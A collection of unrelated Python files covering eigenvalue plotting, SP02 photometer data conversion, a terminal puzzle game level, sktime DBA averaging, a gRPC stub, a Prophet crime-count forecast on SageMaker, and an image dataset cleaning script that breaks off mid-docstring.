eigenvector_3.append(v[2])
# plt.plot(x[-Nx // 2 - 100:Nx // 2 + 100], eigenvalues[-Nx // 2 - 100:Nx // 2 + 100], 'ko')
plt.plot(x, eigenvalues_1, 'ko')
plt.plot(x, eigenvalues_2, 'ro')
plt.plot(x, eigenvalues_3, 'bo')
# print(eigenvector_1[np.where(np.array(eigenvalues_1) > 0.1)[0][0]])
# plt.savefig(f'../../../../plots/spin-1/{filename_prefix}_eigenvalue.png', bbox_inches='tight')
plt.ylim(0, 0.3)
plt.show()
|
# -*- coding: utf-8 -*-
import xarray as xr
import numpy as np
import pandas as pd
import pathlib
class BaselineDatabase(object):
def __init__(self):
self.line_table = pd.DataFrame(columns=['site','install', 'line', 'instrument_id', 'comment'])
self.instrument_table = pd.DataFrame(columns = ['instrument_id','type_id', 'sn', 'config'])
def add2line_table(self, site,install_datetime, line_id, instrument_id, comment = ''):#20200205
install_datetime = pd.to_datetime(install_datetime)
new_line_table_entry = pd.DataFrame({'site':site,'install': install_datetime, 'line': line_id, 'instrument_id': instrument_id, 'comment': comment}, index = [instrument_id])
# self.line_table = self.line_table.append(new_line_table_entry, ignore_index=True)
self.line_table = pd.concat([self.line_table, new_line_table_entry], ignore_index=True)
return
def addnewinstrument(self, instrument_id, type_id, sn, config):
# self.instrument_table = self.instrument_table.append({'instrument_id': instrument_id,'type_id':type_id, 'sn': sn, 'config':config_id}, ignore_index=True)
# new_instrument = pd.DataFrame({'instrument_id': instrument_id,'type_id':type_id, 'sn': sn, 'config':config}, index = [instrument_id])
new_instrument = pd.DataFrame( [[instrument_id, type_id, sn, config]], columns = ['instrument_id', 'type_id', 'sn', 'config'],index = [instrument_id])
self.instrument_table = pd.concat([self.instrument_table, new_instrument])#, ignore_index=True)
return
def get_instrument(self, site, line, date):
# site = 'mlo'
# line = 121
# date = df_all.index[0]
lt_site_line = self.line_table[np.logical_and(self.line_table.site == site, self.line_table.line == line)]
previous_installs = lt_site_line[lt_site_line.install <= date]
if previous_installs.shape[0] == 0:
raise IndexError(f'Instrument not installed (line:{line}, site: {site}, date: {date}')
lt_found = previous_installs.iloc[-1]
instrument_found = self.instrument_table[self.instrument_table.instrument_id == lt_found.instrument_id].iloc[0]
return instrument_found
database = BaselineDatabase()
#### filter comfigurations
conf_1= {'A': 368, 'B': 1050, 'C': 610, 'D': 778}
conf_2= {'A': 412, 'B': 500, 'C': 675, 'D': 862}
#### Instruments
database.addnewinstrument(1,1,1032,conf_2)
database.addnewinstrument(2,1,1046,conf_1)
database.addnewinstrument(3,1,1022,conf_2)
#### instrument linups
installdate = '20131126'
database.add2line_table('mlo', installdate, 121, 2)
database.add2line_table('mlo', installdate, 221, 1)
installdate = '20140104' # something is statring to go wrong on that day!
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20141204'
database.add2line_table('mlo', installdate, 121, 2)
database.add2line_table('mlo', installdate, 221, 1)
installdate = '20151203'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20161211'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20171207'
database.add2line_table('mlo', installdate, 121, 2)
database.add2line_table('mlo', installdate, 221, 1)
database.add2line_table('mlo', '20200205', 121, 1)
database.add2line_table('mlo', '20200205', 221, 2)
database.add2line_table('mlo', '20200620', 121, 2)
database.add2line_table('mlo', '20200620', 221, 1)
installdate = '20210204'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
# # testing: installation in BRW...
# installdate = '20210318'
# uninstalldate = '20211008'
# database.add2line_table('brw', installdate, 121, 1)
# # database.add2line_table('brw', installdate, 101, 1)
# database.add2line_table('brw', installdate, 221, 2)
# database.add2line_table('brw', installdate, 221, 2)
installdate = '20220101'
database.add2line_table('mlo', installdate, 121, 1)
database.add2line_table('mlo', installdate, 221, 2)
installdate = '20220309'
database.add2line_table('mlo', installdate, 121, 3)
def get_lines_from_station_header(path = '/nfs/grad/gradobs/documentation/station_headers/MLO_header.xlsx', line_ids = [121, 221]):
path2header = pathlib.Path(path)
df = pd.read_excel(path2header)
col_names = {}
lines = []
for line_id in line_ids:
idx = (df['Unnamed: 1'] == line_id).argmax()
header = df.iloc[idx-1].dropna().values[1:]
col_names[line_id] = header
lines.append(dict(line_id = line_id, column_labels = header))
return lines
def read_file(path2raw, lines = None,
# collabels = ['lineID', 'Year', 'DOY', 'HHMM', 'A', 'B', 'C', 'D','temp'],
collabels = ['lineID', 'Year', 'DOY', 'HHMM'],
database = None,
site = None
):
"""
The particular way I am reading here allows for later implementation of
reading old data from Longenecker. And also allows to read other raw files
Parameters
----------
path2raw : str, list, pathlib.Path
Single or list of path(s) to file(s).
lines : list, optional
List of lines to consider (e.g. [121, 221] for sp02 at MLO). The default is None -> all.
collabels : TYPE, optional
DESCRIPTION. The default is ['lineID', 'Year', 'DOY', 'HHMM'].
database : TYPE, optional
DESCRIPTION. The default is None.
site : str, optional
DESCRIPTION. The default is None. If None the site is infered from the
file path. Set if the path is not the standard path
Returns
-------
out_list : TYPE
DESCRIPTION.
"""
out = {}
collabels = np.array(collabels)
#open
if not isinstance(path2raw, list):
path2raw = [path2raw,]
df_all = pd.concat([pd.read_csv(p2r, header=None) for p2r in path2raw])
# df_all = pd.read_csv(path2raw, header=None
# # names = False
# )
# out['df_all_01'] = df_all.copy()
colsis = df_all.columns.values
colsis = [int(col) for col in colsis]
# todo: assigne collumn labels accoreding to instrument info
# if 0:
colsis[:collabels.shape[0]] = collabels
df_all.columns = colsis
# out['df_all_02'] = df_all.copy()
# df_all = pd.read_csv(path2raw, names=lines[0]['column_labels'])
# make datetime index
df_all['HHMM'] = df_all.apply(lambda row: f'{int(row.HHMM):04d}', axis=1)
df_all.index = df_all.apply(lambda row: pd.to_datetime(f'{int(row.Year)}0101') + pd.to_timedelta(row.DOY - 1 , 'd') + pd.to_timedelta(int(row.HHMM[:2]), 'h') + pd.to_timedelta(int(row.HHMM[2:]), 'm'), axis=1)
df_all.index.name = 'datetime'
# data_list = []
# df_inst_temp = pd.DataFrame()
# df_inst_channels = pd.DataFrame()
out['df_all'] = df_all.copy()
# return out
out_list = []
date = df_all.index[0]
# print(df_all.lineID.unique())
for lid in df_all.lineID.unique():
if isinstance(lines, list):
if lid not in lines:
print(f'{lid} not in lines ({lines})')
continue
df_lid = df_all[df_all.lineID == lid].copy()
# there was the case that Longenecker must have created an overlab when stiching two days together ... therefor ->
df_lid = df_lid[~df_lid.index.duplicated()]
df_lid.sort_index(inplace=True)
instrument = database.get_instrument(site, lid, date)
df_lid = df_lid.drop(['lineID', 'Year','DOY', 'HHMM'], axis=1)
df_lid.columns = ['A', 'B', 'C', 'D', 'temp']
# replace invalid values with nan
df_lid[df_lid == -99999] = np.nan
df_lid[df_lid == -7999.0] = np.nan
# seperate photo detector readings from temp
df_temp = df_lid.temp
df_voltages = df_lid.reindex(['A', 'B', 'C', 'D'], axis= 1)
df_voltages.columns.name = 'channel'
# create dataset
ds = xr.Dataset()
ds['raw_data'] = df_voltages
ds['internal_temperature'] = df_temp
ser = pd.Series(instrument.config)
ser.index.name = 'channel'
ds['channle_wavelengths'] = ser
ds['line_id'] = lid
sn = instrument['sn']
ds['serial_no'] = sn
# ds_by_instrument[f'sp02_{lid}_{sn}'] = ds
out_list.append(ds)
return out_list
# for line in lines:
# lid = line['line_id']
# dft = df_all[df_all.lineID == lid].copy()
# dft = dft.dropna(axis = 1)
# # replace placeholder with correct column labels
# dft.columns = line['column_labels']
# line['df'] = dft.copy()
# # clean up the channel voltages
# df_channels = dft.drop(['lineID', 'Year', 'DOY', 'HHMM', 'SPO2 internal temp [degC]'], axis=1)
# channels = [int(col.split(' ')[2]) for col in df_channels.columns]
# df_channels.columns = channels
# # df_channels.columns.name = f'wavelength_lid{lid}'
# df_channels[df_channels == -99999] = np.nan
# df_channels[df_channels == -7999.0] = np.nan
# data_list.append(df_channels.copy())
# # clean up temp
# temp = dft['SPO2 internal temp [degC]'].copy()
# temp[temp == -99999] = np.nan
# temp[temp == -7999.0] = np.nan
# df_inst_temp[lid] = temp
# # print(len(channels))
# # print(channels)
# df_inst_channels[lid] = channels
# # line['raw_data'] = df_channels
# # ds[f'rawdata_line_id_{lid}'] = df_channels
# # ds[f'instrument_temperature_line_id_{lid}'] = temp
# # ds['line_ids'] = lines
# ds = xr.Dataset()
# data = pd.concat(data_list, axis=1).sort_index(axis=1)
# data.columns.name = 'channel_wavelength'
# ds['raw_data'] = data
# df_inst_temp.columns.name = 'line_id'
# ds['instrument_temperatures'] = df_inst_temp
# df_inst_channels.columns.name = 'line_id'
# df_inst_channels.index = [chr(ord('A') + i) for i in df_inst_channels.index]
# df_inst_channels.index.name = 'channel'
# ds['instrument_channels'] = df_inst_channels
# return ds
def convert_raw2nc(path2rawfolder = '/nfs/grad/gradobs/raw/mlo/2020/', path2netcdf = '/mnt/telg/data/baseline/mlo/2020/',
# database = None,
start_date = '2020-02-06',
pattern = '*sp02.*',
sernos = [1032, 1046],
site = 'mlo',
overwrite = False,
verbose = False,
raise_error = True,
test = False):
"""
Parameters
----------
path2rawfolder : TYPE, optional
DESCRIPTION. The default is '/nfs/grad/gradobs/raw/mlo/2020/'.
path2netcdf : TYPE, optional
DESCRIPTION. The default is '/mnt/telg/data/baseline/mlo/2020/'.
# database : TYPE, optional
DESCRIPTION. The default is None.
start_date : TYPE, optional
DESCRIPTION. The default is '2020-02-06'.
pattern : str, optional
Only files with this pattern are considered. In newer raw data
versions this would be '*sp02.*'. In older ones: 'MLOD*'
sernos : TYPE, optional
DESCRIPTION. The default is [1032, 1046].
overwrite : TYPE, optional
DESCRIPTION. The default is False.
verbose : TYPE, optional
DESCRIPTION. The default is False.
test : TYPE, optional
If True only one file is processed. The default is False.
Returns
-------
None.
"""
# lines = get_lines_from_station_header()
path2rawfolder = pathlib.Path(path2rawfolder)
path2netcdf = pathlib.Path(path2netcdf)
try:
path2netcdf.mkdir(exist_ok=True)
except FileNotFoundError:
path2netcdf.parent.mkdir()
path2netcdf.mkdir()
file_list = list(path2rawfolder.glob(pattern))
# print(len(file_list))
# file_contents = []
# return file_list
df_in = pd.DataFrame(file_list, columns=['path_in'])
# test what format, old or new.
p2f = file_list[0]
nl = p2f.name.split('.')
if len(nl) == 2:
# old format like /nfs/grad/gradobs/raw/mlo/2013/sp02/MLOD013A.113
# get year from path
def path2date(path2file):
year = path2file.parent.parent.name
jul = int(''.join(filter(str.isdigit, path2file.name.split('.')[0])))
date = pd.to_datetime(year) + pd.to_timedelta(jul-1, 'd')
return date
# df_in.index = df_in.path_in.apply(lambda x: pd.to_datetime(year) + pd.to_timedelta((int(''.join(filter(str.isdigit, x.name.split('.')[0]))))-1, 'd'))
else:
# new format: gradobs.mlo-sp02.20200126.raw.dat
# df_in.index = df_in.path_in.apply(lambda x: pd.to_datetime(x.name.split('.')[2]))
path2date = lambda x: pd.to_datetime(x.name.split('.')[2])
# set index based on format
df_in.index = df_in.path_in.apply(path2date)
df_in.sort_index(inplace=True)
df_in = df_in.truncate(before=start_date)
df_out = pd.DataFrame(columns=['path_out'])
# generate output path
for sn in sernos:
for idx, row in df_in.iterrows():
# fnnc = row.path_in.name.replace('.dat','.nc')
# fnnc = fnnc.replace('-sp02', '.sp02')
# fnns = fnnc.split('.')
# fnns = fnns[:3] + [f'sn{str(sn)}'] + fnns[3:]
# fnnc = '.'.join(fnns)
# path2netcdf_file = path2netcdf.joinpath(fnnc)
date = idx
fnnc = f'gradobs.mlo.sp02.sn{sn}.{date.year}{date.month:02d}{date.day:02d}.raw.nc'
path2netcdf_file = path2netcdf.joinpath(fnnc)
df_add = pd.DataFrame({'path_in': row.path_in, 'path_out':path2netcdf_file}, index = [idx]
# ignore_index=True
)
df_out = df_out.append(df_add)
# check if file exists. Process only those that do not exist
df_out['exists'] = df_out.path_out.apply(lambda x: x.is_file())
df_work = df_out[~df_out.exists]
# return df_work
### bsts
work_array = df_work.path_in.unique()
print(f'No of files that need to be processed: {len(work_array)}')
# exists = 0
# new = 0
for e, file in enumerate(work_array):
# if e == 3: break
# ds = read_file(file, lines)
df_sel = df_work[df_work.path_in == file]
try:
dslist = read_file(file, database = database, site = site)
except IndexError:
if raise_error:
raise
else:
print('Instrument not installed ... skip', end = '...')
if test:
return {'file': file, 'database': database}
else:
continue
### generate output file name
# processing
for ds in dslist:
# fnnc = file.name.replace('.dat','.nc')
# fnnc = fnnc.replace('-sp02', '.sp02')
# fnns = fnnc.split('.')
# fnns = fnns[:3] + [f'sn{str(ds.serial_no.values)}'] + fnns[3:]
# fnnc = '.'.join(fnns)
# path2netcdf_file = path2netcdf.joinpath(fnnc)
# check which of the output files is the right ... still, i am not convinced this is the most elegant way to do this.... add the lineno in the work table?
sn = str(ds.serial_no.values)
try:
path2netcdf_file = [p2fo for p2fo in df_sel.path_out.values if sn in p2fo.name][0]
except IndexError:
assert(False), 'This Error is usually caused because one of the netcdf files (for a serial number) is deleted, but not the other.'
# save to file
ds.to_netcdf(path2netcdf_file)
if test:
break
# out = dict(processed = new,
# skipped = exists,
# last_ds_list = dslist)
if not test:
df_out['exists'] = df_out.path_out.apply(lambda x: x.is_file())
df_work = df_out[~df_out.exists]
work_array = df_work.path_in.unique()
assert(df_work.shape[0] == 0), f'df_work should be empty at the end. Still has {df_work.shape[0]} entries.'
return
|
from typing import Any, Iterable, Optional, Type
from blessed import Terminal
from pydantic import BaseModel
from app import constants as const
from app.actions import Action, Move, action_from_str
from app.entities import Exit, MovingWall, Patrol, PatrolVision, Player, Wall
from app.types.events import Event
from app.types.hitbox import HitBox
from app.types.state import LevelState
from app.windows.cmd_help import CmdHelpWindow
from app.windows.cmd_list import CmdListwindow
from app.windows.map import MapWindow
from app.windows.user_input import UserInputWindow
class Level(BaseModel):
"""All components needed to track state and render a level"""
title: str
number: int
max_commands: int
description: str
player: Player
entities: list
allowed_commands: list[Type[Action]]
state: dict[int, LevelState] = {0: LevelState.Planning}
current_input: str = ""
current_time: int = 0
term: Optional[Any] = None
@property
def current_state(self) -> LevelState:
"""Get current state based on current time"""
return self.state.get(self.current_time, LevelState.Planning)
@property
def map_initial(self) -> MapWindow:
"""Generate the initial map window"""
entity_boxes = self.get_boxes_at(0)
return MapWindow(
level_name=self.title, level_number=self.number, boxes=entity_boxes
)
def get_boxes_at(self, time: int) -> Iterable[HitBox]:
"""Get all hitboxes for a given time"""
yield self.player.get_hitbox_at(time)
for e in self.entities:
if isinstance(e, Patrol):
for v in e.get_current_vision(time):
box = v.get_hitbox_at(time)
if box.in_bounds:
yield box
box = e.get_hitbox_at(time)
if box.in_bounds:
yield box
def get_collisions_at(self, time: int) -> Iterable[tuple[HitBox, HitBox]]:
"""Identify all collisions at a given time"""
boxes = self.get_boxes_at(time)
table = {}
for box in boxes:
key = (box.pos_x, box.pos_y)
if key not in table:
table[key] = box
else:
yield table[key], box
def handle_collisions_at(self, time: int) -> None:
"""Update level state for all collisions"""
for col in self.get_collisions_at(time):
box_1, box_2 = col
parents = {box_1.parent, box_2.parent}
if parents == {Player, Exit}:
self.state[box_1.time] = LevelState.Win
break
elif parents == {Player, Wall} or parents == {Player, MovingWall}:
action = self.player.get_action_at(box_1.time)
if isinstance(action, Move):
action.halt_times.append(box_1.time)
elif parents == {Player, Patrol} or parents == {Player, PatrolVision}:
self.state[box_1.time] = LevelState.Spotted
break
else:
pass
@property
def map_sequence(self) -> Iterable[MapWindow]:
"""Generate a mpawindow sequence"""
for t in range(0, self.player.time_consumed + 1):
self.current_time += 1
boxes = self.get_boxes_at(t)
if t == self.player.time_consumed:
self.state[self.current_time] = LevelState.ExitNotReached
yield MapWindow(
level_name=self.title,
level_number=self.number,
boxes=boxes,
)
if self.current_state in LevelState.terminal():
break
@property
def cmd_list(self) -> CmdListwindow:
"""Generate a command list window"""
return CmdListwindow(
max_commands=self.max_commands,
issued_commands=[str(a) for a in self.player.actions],
)
@property
def cmd_help(self) -> CmdHelpWindow:
"""Generate a command help window"""
return CmdHelpWindow(allowed_commands=self.allowed_commands)
@property
def user_input(self) -> UserInputWindow:
"""Generate a user input window"""
return UserInputWindow(current_input=self.current_input)
def resolve_collisions(self) -> None:
"""Resolve collisions for the last action"""
last_action = self.player.actions[-1]
from_time = self.player.time_consumed - last_action.length
for t in range(from_time, self.player.time_consumed + 1):
self.handle_collisions_at(t)
def listen(self, term: Terminal) -> list[Event]:
"""Listen and handle keyboard events"""
if key := term.inkey():
if key.code == const.BACKSPACE:
self.current_input = self.current_input[:-1]
return [Event.UpdateInput]
elif key.code == const.ENTER:
action, flag = action_from_str(self.current_input, self.player)
if flag and action:
self.player.actions.append(action)
self.current_input = ""
return [
Event.UpdateCmdList,
Event.UpdateInput,
Event.ResolveCollisions,
]
else:
self.current_input = ""
return [Event.InvalidInput]
elif key.code == const.DEBUG_KEY:
return [Event.StartSequence, Event.EndLevel]
elif (key.isalnum() or key.isspace()) and len(
self.current_input
) < const.INPUT_MAX_LENGTH:
self.current_input += key.lower()
return [Event.UpdateInput]
return []
|
# -*- coding: utf-8 -*-
__author__ = ["chrisholder"]
from typing import Tuple
import numpy as np
from numba import njit
from sktime.clustering.metrics.medoids import medoids
from sktime.distances import distance_alignment_path_factory
from sktime.distances.base import DistanceAlignmentPathCallable
def dba(
X: np.ndarray,
max_iters: int = 30,
tol=1e-5,
averaging_distance_metric: str = "dtw",
medoids_distance_metric: str = "dtw",
precomputed_medoids_pairwise_distance: np.ndarray = None,
verbose: bool = False,
**kwargs,
) -> np.ndarray:
"""Compute the dtw barycenter average of time series.
This implements the'petitjean' version (orginal) DBA algorithm [1]_.
Parameters
----------
X : np.ndarray (3d array of shape (n, m, p) where n is number of instances, m
is the dimensions and p is the timepoints))
Time series instances compute average from.
max_iters: int, defaults = 30
Maximum number iterations for dba to update over.
tol : float (default: 1e-5)
Tolerance to use for early stopping: if the decrease in cost is lower
than this value, the Expectation-Maximization procedure stops.
averaging_distance_metric: str, defaults = 'dtw'
String that is the distance metric to derive the distance alignment path.
medoids_distance_metric: str, defaults = 'euclidean'
String that is the distance metric to use with medoids
precomputed_medoids_pairwise_distance: np.ndarray (of shape (len(X), len(X)),
defulats = None
Precomputed medoids pairwise.
verbose: bool, defaults = False
Boolean that controls the verbosity.
Returns
-------
np.ndarray (2d array of shape (m, p) where m is the number of dimensions and p is
the number of time points.)
The time series that is the computed average series.
References
----------
.. [1] <NAME>, <NAME> & <NAME>. A global averaging method
for dynamic time warping, with applications to clustering. Pattern
Recognition, Elsevier, 2011, Vol. 44, Num. 3, pp. 678-693
"""
if len(X) <= 1:
return X
# center = X.mean(axis=0)
center = medoids(
X,
distance_metric=medoids_distance_metric,
precomputed_pairwise_distance=precomputed_medoids_pairwise_distance,
)
path_callable = distance_alignment_path_factory(
X[0], X[1], metric=averaging_distance_metric, **kwargs
)
cost_prev = np.inf
for i in range(max_iters):
center, cost = _dba_update(center, X, path_callable)
if abs(cost_prev - cost) < tol:
break
elif cost_prev < cost:
break
else:
cost_prev = cost
if verbose is True:
print(f"[DBA sktime] epoch {i}, cost {cost}") # noqa: T001
return center
@njit(fastmath=True)
def _dba_update(
center: np.ndarray, X: np.ndarray, path_callable: DistanceAlignmentPathCallable
) -> Tuple[np.ndarray, float]:
"""Perform an update iteration for dba.
Parameters
----------
center: np.ndarray (2d array of shape (m, p) where m is the number of dimensions
and p is the number of time point)
Time series that is the current center (or average).
X : np.ndarray (3d array of shape (n, m, p) where n is number of instances, m
is the dimensions and p is the timepoints))
Time series instances compute average from.
path_callable: Callable[Union[np.ndarray, np.ndarray], tuple[list[tuple], float]]
Callable that returns the distance path.
Returns
-------
np.ndarray (2d array of shape (m, p) where m is the number of dimensions and p is
the number of time points.)
The time series that is the computed average series.
"""
X_size, X_dims, X_timepoints = X.shape
sum = np.zeros((X_timepoints))
alignment = np.zeros((X_dims, X_timepoints))
cost = 0.0
for i in range(X_size):
curr_ts = X[i]
curr_alignment, _ = path_callable(curr_ts, center)
for j, k in curr_alignment:
alignment[:, k] += curr_ts[:, j]
sum[k] += 1
cost += np.linalg.norm(curr_ts[:, j] - center[:, k]) ** 2
return alignment / sum, cost / X_timepoints
|
<filename>src/govsw/api/vswapi/vswapi_pb2_grpc.py<gh_stars>100-1000
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
import vswapi_pb2 as vswapi__pb2
class VswApiStub(object):
# missing associated documentation comment in .proto file
pass
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.ModIfname = channel.unary_unary(
'/vswapi.VswApi/ModIfname',
request_serializer=vswapi__pb2.ModIfnameRequest.SerializeToString,
response_deserializer=vswapi__pb2.ModIfnameReply.FromString,
)
self.GetIfnames = channel.unary_stream(
'/vswapi.VswApi/GetIfnames',
request_serializer=vswapi__pb2.GetIfnamesRequest.SerializeToString,
response_deserializer=vswapi__pb2.GetIfnamesReply.FromString,
)
self.ModLink = channel.unary_unary(
'/vswapi.VswApi/ModLink',
request_serializer=vswapi__pb2.ModLinkRequest.SerializeToString,
response_deserializer=vswapi__pb2.ModLinkReply.FromString,
)
self.GetLinks = channel.unary_stream(
'/vswapi.VswApi/GetLinks',
request_serializer=vswapi__pb2.GetLinksRequest.SerializeToString,
response_deserializer=vswapi__pb2.GetLinksReply.FromString,
)
self.GetStats = channel.unary_stream(
'/vswapi.VswApi/GetStats',
request_serializer=vswapi__pb2.GetStatsRequest.SerializeToString,
response_deserializer=vswapi__pb2.GetStatsReply.FromString,
)
self.SaveConfig = channel.unary_unary(
'/vswapi.VswApi/SaveConfig',
request_serializer=vswapi__pb2.SaveConfigRequest.SerializeToString,
response_deserializer=vswapi__pb2.SaveConfigReply.FromString,
)
class VswApiServicer(object):
# missing associated documentation comment in .proto file
pass
def ModIfname(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetIfnames(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ModLink(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetLinks(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStats(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SaveConfig(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_VswApiServicer_to_server(servicer, server):
rpc_method_handlers = {
'ModIfname': grpc.unary_unary_rpc_method_handler(
servicer.ModIfname,
request_deserializer=vswapi__pb2.ModIfnameRequest.FromString,
response_serializer=vswapi__pb2.ModIfnameReply.SerializeToString,
),
'GetIfnames': grpc.unary_stream_rpc_method_handler(
servicer.GetIfnames,
request_deserializer=vswapi__pb2.GetIfnamesRequest.FromString,
response_serializer=vswapi__pb2.GetIfnamesReply.SerializeToString,
),
'ModLink': grpc.unary_unary_rpc_method_handler(
servicer.ModLink,
request_deserializer=vswapi__pb2.ModLinkRequest.FromString,
response_serializer=vswapi__pb2.ModLinkReply.SerializeToString,
),
'GetLinks': grpc.unary_stream_rpc_method_handler(
servicer.GetLinks,
request_deserializer=vswapi__pb2.GetLinksRequest.FromString,
response_serializer=vswapi__pb2.GetLinksReply.SerializeToString,
),
'GetStats': grpc.unary_stream_rpc_method_handler(
servicer.GetStats,
request_deserializer=vswapi__pb2.GetStatsRequest.FromString,
response_serializer=vswapi__pb2.GetStatsReply.SerializeToString,
),
'SaveConfig': grpc.unary_unary_rpc_method_handler(
servicer.SaveConfig,
request_deserializer=vswapi__pb2.SaveConfigRequest.FromString,
response_serializer=vswapi__pb2.SaveConfigReply.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'vswapi.VswApi', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
|
<filename>CS-383_Cloud-Computing_2020-Spring/prophet-forecasting/CloudProjectCode1.py
# import libraries
import boto3, re, sys, math, json, os, sagemaker, urllib.request
from sagemaker import get_execution_role
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from IPython.display import Image
from IPython.display import display
from time import gmtime, strftime
from sagemaker.predictor import csv_serializer
import random
import seaborn as sns
!conda install -c plotly plotly==3.10.0 --yes
!conda install -c conda-forge fbprophet --yes
from fbprophet import Prophet
Prophet()
# Define IAM role
role = get_execution_role()
prefix = 'sagemaker/DEMO-xgboost-dm'
containers = {'us-west-2': '433757028032.dkr.ecr.us-west-2.amazonaws.com/xgboost:latest',
'us-east-1': '811284229777.dkr.ecr.us-east-1.amazonaws.com/xgboost:latest',
'us-east-2': '825641698319.dkr.ecr.us-east-2.amazonaws.com/xgboost:latest',
'eu-west-1': '685385470294.dkr.ecr.eu-west-1.amazonaws.com/xgboost:latest'} # each region has its XGBoost container
my_region = boto3.session.Session().region_name # set the region of the instance
print("Success - the MySageMakerInstance is in the " + my_region + " region. You will use the " + containers[my_region] + " container for your SageMaker endpoint.")
#Import the dataset
try:
data = pd.read_csv('WorcesterData_03_19.csv',index_col=0)
print('Success: Data loaded into dataframe.')
except Exception as e:
print('Data load error: ',e)
data.head()
# Let's see how many null elements are contained in the data
plt.figure(figsize=(10,10))
sns.heatmap(data.isnull(), cbar = False, cmap = 'YlGnBu')
data.ACTUAL_DTE = pd.to_datetime(data.ACTUAL_DTE, format='%m/%d/%Y %H:%M')
# setting the index to be the date
data.index = pd.DatetimeIndex(data.ACTUAL_DTE)
# Resample is a Convenience method for frequency conversion and resampling of time series.
plt.plot(data.resample('Y').size())
plt.title('Crimes Count Per Year')
plt.xlabel('Years')
plt.ylabel('Number of Crimes')
#Resampling the data
data.resample('M').size()
# Resample is a Convenience method for frequency conversion and resampling of time series.
plt.plot(data.resample('M').size())
plt.title('Crimes Count Per Month')
plt.xlabel('Months')
plt.ylabel('Number of Crimes')
data.resample('Q').size()
# Resample is a Convenience method for frequency conversion and resampling of time series.
plt.plot(data.resample('Q').size())
plt.title('Crimes Count Per Quarter')
plt.xlabel('Quarters')
plt.ylabel('Number of Crimes')
#Preparing the data for the prediction by using prophet
data_prophet = data.resample('M').size().reset_index()
data_prophet
data_prophet.columns = ['Date', 'Crime Count']
data_prophet
data_prophet_df = pd.DataFrame(data_prophet)
data_prophet_df
#renaming the columns in order to adapt it to the prediction
data_prophet_df2 = data_prophet_df.rename(columns={'Date':'ds', 'Crime Count':'y'})
data_prophet_df2
m = Prophet()
m.fit(data_prophet_df2)
# Forcasting into the future
future = m.make_future_dataframe(periods=365)
forecast = m.predict(future)
forecast
#Visualize
figure = m.plot(forecast, xlabel='Date', ylabel='Crime Rate')
#Visualizing the trend for the future years
figure3 = m.plot_components(forecast) |
<reponame>isLinXu/DatasetMarkerTool<gh_stars>1-10
# -*-coding:utf-8-*-
'''使用walk方法递归遍历目录文件,walk方法会返回一个三元组,分别是root、dirs和files。
其中root是当前正在遍历的目录路径;dirs是一个列表,包含当前正在遍历的目录下所有的子目录名称,不包含该目录下的文件;
files也是一个列表,包含当前正在遍历的目录下所有的文件,但不包含子目录。
'''
import os
from PIL import Image
import cv2
from utils.fileHelper import os_mkdir
def images_Normalization(path, img_show=True):
"""
图像数据归一化
:param path:
:param img_show:
:return:
"""
for root, dirs, files in os.walk(path):
print('################################################################')
for name in files:
if len(dirs) == 0:
fname = os.path.join(root, name)
print('fname', fname)
print('name', name)
# 处理原图img
src = cv2.imread(fname)
src = cv2.resize(src, (640, 480))
if img_show:
cv2.imshow('src_img', src)
k = cv2.waitKey() & 0xff
if k == 27: return 0
# 创建src目录并存储图片
src_dir = root + '/src/'
src_path = root + '/src/' + name
print('src_dir', src_dir)
print('src_path', src_path)
os_mkdir(src_dir)
cv2.imwrite(src_path, src)
# 图片采集数据清洗
def dataWash(path, r_tag=False, w_min=300, w_max=1000, h_min=300, h_max=1000):
'''
遍历指定文件夹中所有文件
:param path:
:return:
'''
global timg, img, w, h
print('开始遍历......')
for root, dirs, files in os.walk(path):
ratelist = []
timglist = []
idict = {}
# 第一次清洗,删除文件出错或打不开的图片文件
print('#######################第一次清洗-开始#######################')
for name in files:
if len(dirs) != 0:
fname = os.path.join(root, name)
try:
timg = os.path.join(root, name)
img = Image.open((timg))
# 图像文件长与宽
w = img.width
h = img.height
rate = w / h
print(fname, 'w=', w, 'h=', h, 'rate=', rate)
ratelist.append(rate)
timglist.append(timg)
# 剔除图片
if (r_tag):
if w in range(w_min, w_max) and h in range(h_min, h_max):
os.remove(timg)
print('删除图片')
print(timg)
pass
# 显示图片并进行调整大小
src = cv2.imread(fname)
cv2.namedWindow('src', cv2.WINDOW_AUTOSIZE)
# src = cv2.resize(src, (0, 0), fx=0.1, fy=0.1, interpolation=cv2.INTER_NEAREST)
src = cv2.resize(src, (640, 480))
cv2.imshow('src', src)
k = cv2.waitKey(0)
if k == 27: return 0
except:
print('删除图片', timg)
os.remove(timg) # 删除打不开的文件
img.close()
print('#######################第一次清洗-结束#######################')
# print(ratelist)
ulists = list(set(ratelist))
# print(ulists)
# 图片采集数据清洗
def dataWash_1(path, r_tag=False, w_min=300, w_max=1000, h_min=300, h_max=1000):
'''
